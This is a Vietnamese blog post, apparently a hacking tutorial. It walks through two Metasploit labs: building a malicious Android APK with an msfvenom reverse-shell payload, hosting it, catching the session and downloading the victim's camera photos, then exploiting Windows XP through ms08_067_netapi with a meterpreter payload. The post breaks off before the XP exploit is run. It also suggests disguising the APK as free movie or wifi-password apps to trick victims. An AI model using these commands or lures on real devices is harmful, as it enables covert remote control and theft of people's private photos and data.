Đánh cắp dữ liệu trên điện thoại Android sử dụng Framework Metasploit




h3LLo anh em! Hack mãi web rồi, ta lại chuyển qua hack mobile, haha.....Hôm nay mình cùng các bạn tìm hiểu về thằng metasploit. 

Vậy Metasploit là gì?
- Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Kiến trúc metasploit sẽ như sau:


Thành phần trong kiến trúc:
 - REX: thư viện cơ bản cho hầu hết các nhiệm vụ, xử lý các cổng kết nối, giao thức, chuyển đổi văn bản, HTTP, BASE64.
- MSF::CORE: cung cấp các API cơ bản, xác định khung Metasploit.
- MSF::BASE: cung cấp các API thân thiện, các API đơn giản hóa để sử dụng trong khung.

Hehe, đá tý lý thuyết thế thôi, anh em triển khai theo đúng tiêu đề blog nhỉ.

Lab 1: Đánh cắp dữ liệu trên điện thoại Android sử dụng fw Metasploit.

Chuẩn bị:  1 máy ảo chạy hệ điều hành kali linux và 1 máy ảo chạy hệ điều hành android.

- Đầu tiên ta kiểm tra địa chỉ ip của máy ảo chạy Kali Linux và kích hoạt máy chủ webserver.


Ok, giờ tạo ứng dụng android độc hại và tải lên máy chủ webserver vừa start.
Lệnh thực hiện: 
msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.207.135 LPORT=4444 R> /var/www/html/quangat04.apk
    

Tiếp theo anh em khởi chạy framework metasploit và thiết lập chế độ lắng nghe khi máy nạn nhân có khởi động ứng dụng độc hại đã tạo ở trên.

Lệnh chạy metasploit: msfconsole
Lệnh lắng nghe phiên ứng dụng độc hại khi máy nạn nhân chạy ứng dụng:
Use multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
Set LHOST 192.168.207.135
Set LPORT 4444
Exploit
   

Tiến hành cài đặt file này ở máy ảo android và chạy dưới dạng ứng dụng (yêu cầu cấp quyền truy cập).

Trên thực tế ứng dụng độc hại này có thể lừa nạn nhân bằng các vỏ bọc của ứng dụng tiện ích như: xem phim miễn phí, xem mật khẩu wifi hàng xóm, đọc truyện miễn phí… để lừa nạn nhân tải về vài sử dụng. Hoặc kẻ tấn công bằng cách nào đó cài trực tiếp vào máy nạn nhân.

    

    

Sau đó tiến hành cài đặt và mở ứng dụng 
Khi nạn nhân mở ứng dụng, bên máy ảo kali linux ngay lập tức bắt được phiên làm việc ứng dụng của nạn nhân.


    Truy cập vào phiên làm việc này bằng câu lệnh.
    Sessions -i 1
    

    Ở bước này chúng ta sẽ tiến hành đánh cắp toàn bộ thư mục ảnh có trong máy nạn nhân.

   Thực hiện lệnh sau: download -a /sdcard/DCIM/Camera

    

   Sau khi đánh cắp được toàn bộ thư mục Camera dữ liệu sẽ được lưu tại root bên máy ảo kali linux.


Ok. Chấm hết cho nạn nhân. :))

Lab 2: Tấn Công Windows XP bằng Metasploit 
Mô hình lab:
Hệ điều hành Kali linux bản 64 bit của kẻ tấn công: Giả sử có địa chỉ IP là 172.16.100.2
Windows XP SP0: Giả sử có địa chỉ IP là 172.16.100.5.
Mục đích: sử dụng lỗ hỏng ms08_067_netapi và payload meterpreter để khai thác vào Windows XP.
Mục Tiêu: Qua bài này ta đã hiểu rõ hơn về cách mà Metasploit hoạt động, từ đó ta có thể dễ dàng tìm hiểu thêm về các exploit và payload khác để thực hiện tấn công. Ở bài viết tiếp theo của series này mình sẽ hướng dẫn về payload meterpreter để sử dụng điều khiển và chiếm quyền hệ thống của mục tiêu.
Các bước thực hiện:
- Bước 1: Chọn exploit và thiết lập tham số:
Trước tiên thì ta hãy dùng quét phiên bản windows cũng qua lỗ hỏng smb.
Lệnh: msf > use auxiliary/scanner/smb/smb_version


Xem các thiết lập cần thiết cho exploit này.
Lệnh: msf auxiliary(smb_version) > show options
Bạn nhìn thấy, yêu cầu tham số RHOSTS phải có (cột Required là yes), và cột Current Setting còn trống vì vậy ta phải thiết lập cho nó. Mục tiêu tấn công của ta là máy ảo Windows XP, vì vậy hãy điền IP của nó vào.
Lệnh: msf auxiliary(smb_version) > set RHOSTS 172.16.100.5


Và bắt đầu quét:
Lệnh: msf auxiliary(smb_version) > exploit
 
        

Vậy là ta đã có được phiên bản hệ điều hành của mục tiêu: Windows XP SP0 / 1 (language:English).
- Bước 2: Sử dụng exploit ms08_067_netapi
Tiếp theo ta sẽ thực hiện tấn công qua exploit ms08_067_netapi:
Lệnh: msf auxiliary(smb_version) > use exploit/windows/smb/ms08_067_netapi

       
Xem các tham số cần thiết cho exploit này:
Lệnh: msf exploit(ms08_067_netapi) > show options
Tham số RHOST được yêu cầu chính là địa chỉ của mục tiêu:
Lệnh: msf exploit(ms08_067_netapi) > set RHOST 172.16.100.5

    

- Bước 3: Chọn payload và thiết lập tham số
Sau khi thiếp lập xong hãy kiểm tra lại, và chọn một payload. Mình sẽ sử dụng payload meterpreter/reverse_tcp:
Lệnh: msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
Lệnh: msf exploit(ms08_067_netapi) > show options
Thiết lập tham số LHOST là máy đang chạy Metasploit.
Lệnh: msf exploit(ms08_067_netapi) > set LHOST 172.16.100.2

        

- Bước 4: Xác định mục tiêu tấn công:
Lệnh: msf exploit(ms08_067_netapi) > show targets